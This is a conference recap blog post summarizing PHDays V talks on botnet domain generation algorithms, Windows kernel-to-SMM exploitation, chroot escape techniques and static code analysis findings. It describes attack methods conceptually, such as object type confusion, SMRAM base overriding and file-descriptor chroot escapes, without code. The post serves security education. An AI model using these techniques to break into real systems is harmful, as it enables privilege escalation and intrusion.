Здравствуйте Insinuator Followers,
End of May eight ERNW members were travelling to Moscow (Russia) to visit the PHDays V conference. It was a very nice trip because we met a lot of gentle people, ate some great food and had quite some fun in this exciting and history-charged metropole, and we were able to get around using hands and feet (and Google translate ;-)).
The remainder of this post contains summaries of some of the most interesting talks at PHD V:
DGAs and Threat Intelligence
By John Bambenek
John Bambenek, a chief forensic examiner from the USA shared his experience in taking down botnets. He focused on so called Domain Generation Algorithms (DGA) that are used by botnet malware to create and register new domain names for their command and control (c&c) servers to be reachable. An important requirement for these domains is that all of the different peers of the botnet use the same seed so they generate the same domain name to which they can connect in the next step. John illustrated that the botnets of the first generation used static domain lists and/or static seeds for the DGAs which have been used by the investigators to predict and register the domains before the botnet could do it. So it was possible to curb the spreading of the malware c&c servers and take down the botnet. However the current generation of botnet malware uses the daily currency exchange courses of international banks as seeds for their DGAs. As this information is not predictable there is currently no way to take down this kind of botnets.
Next to those technical information John also shared some interesting statistics and examples:
The famous and widely known worm Conficker (exploiting MS08-067) used a PRNG with the current date as seed for its DGA. The versions A & B of the worm registered 250 domain names across 5 (A) and 8 (B) top level domains.
Cryptolocker, a malware that is spread over multiple different channels (Flashback OSX worm, PDF, Browser exploits, etc.), registered 1000 domains per day across 7 TLDs until it was taken down by the registration of a few 1000 domains to prevent connection to the c2c servers.
The currently active botnet malware bedep downloads an XML document from the official website of the European Central Bank to parse several values out of it and use them as a seed for its next domain registrations. Further information about this botnet malware can be found here.
According to John, most of the future DGAs will either use information that cannot be predicted (to prevent take-down attempts) or they will use TOR for their c&c servers, which is another alternative for botnet malware to be hidden.
Memory Corruption: from Sandbox to SMM
By Nikita Tarakonov
Nikita presented some of his exploitation techniques of the windows kernel and how to gain control in the System Management Mode (SMM). The talk was presented in Russian but was simultaneously translated into english (although the translators were a bit overwhelmed by the highly technical topic).
The first part of the the talk focused on gaining control in ring0 (kernel mode) from ring3 (user mode) by using memory corruptions. Nikita focused on pool overflows and in special object metadata corruption (DKOHM, Direct Kernel Object Header Manipulation)
and object type confusion (DKOHM + DKOM, Direct Kernel Object Manipulation).
In terms of DKOHM a special entry in the kernel object type callback table exists, which contains a link to a callback function at the address 0xbad0b0b0. By injecting an object header with the correct type (pointing to the special address entry) and an allocation of the address by heap spraying, an attacker could be able to execute arbitrary code in the ring0 context. This special address was removed in windows 8.1, so another technique was found to get ring0 execution. This was done by fooling the kernel object manager to get confused which type the current object actually has, this leads after several dereferences to controllable callback pointers => WIN!
In the second part Nikita has gone a step further and tried to gain even more privileges: execution in the SMM. This mode is normally preserved for hardware and vendor operations and is even protected against the kernel. This is done by a protected memory page (SMRAM) which stores the current execution state so the normal program flow could continue after a SMI handler has finished his work. Nikita was able to override the stored base address of the protected page to call a fake SMI handler.
This handler disables the hardware protection of the original SMRAM and resets the base address to its original value. Now he’s able to completely control the data inside the SMRAM with kernel rights, and therefore is able to run arbitrary code in SMM.
Slides can be found here.
Chw00t: Breaking Unices’ Chroot Solutions
By Balazs Bucsay
Within this talk Balazs tried to show how insecure chroot could be when used as a security measure.
According to Balazs, many users still use chroot as a security measure to prevent access to other filesystem trees (instead of solutions like FreeBSD jail or Linux LXC). He presented several ways to gain access to the outer filesystem trees if you are placed inside a chroot environment.
tl;dr: If you are able to get a file descriptor which points to a file or directory outside of the chroot environment, you win.
Therefore his examples represent different ways to get such file descriptors.
Some of the techniques require root privileges:
- inject a kernel module
- get access to a process outside of the chroot
- create a inner chroot and pass a file descriptor from the outer environment into it
and some do not:
- find files/directories which will be moved outside of the environment by external processes
- attach to another process via ptrace (only on BSD)
Nearly all of the techniques were fairly simple and showed again that you should not rely on chroot if you want to prevent users to access specific files/directories.
Balazs started his presentation with a list of requirements which needs to be
considered if you want to use chroot in a more secure way:
- all directories have to be owned by root:root
- no suid processes most be accessible by the user
- distinct and unique uids/gids over the users
- users can not modify sensitive files or directories
- close all file descriptors before changing to the chroot environment
- change the current working directory before chrooting
- don’t mount /proc inside the chroot
- use /var/empty for empty environments
Static Analysis of Source Code After 200 Open-Source Projects
By Andrey Karpov and Evgeny Ryzhkov
Andrey Karpov, the inventor and developer of the static code analyzer Viva64, presented the overall results of his last 200 open source code review projects. Within these projects he was able to collect a lot of experience in the field of open source development and he wanted to share the seven most common failures with the audience. During the first few slides Andrey introduced himself and stated a short list of his review projects which contained large open source projects like Chromium, Tor, the Linux Kernel, Oracle VirtualBox, Firefox and so on. After this introduction he started with the “seven sins of programmers” as he called them. He described that most of these “sins” are simple mistakes where programmers rely on compiler features that do not apply in some specific cases. Also copy & paste mistakes where a bunch of lines gets pasted multiple times into the source code and only one value has to be changed in each of the bunches but the developer misses one and so creates a bug that is hard to find are very common and because of this part of the seven sins. He also described that there are much conversations with security as topic in the field of open source development, but noone tests it really, which in his opinion has to be improved in the future.
All in all Andrey showed that a lot of mistakes within open source software result not only from technical problems but also from specific characteristics of developers that sometimes run their heads against walls when dealing with complex applications. He gave a nice overview of reasons for the most common development problems even though he did not describe ways to find them more efficiently.
Grab his slides here.
We had a great time in Russia and we’re looking forward to see some of our friends at Troopers next year 🙂
Your ERNW Squad ‘Moscow’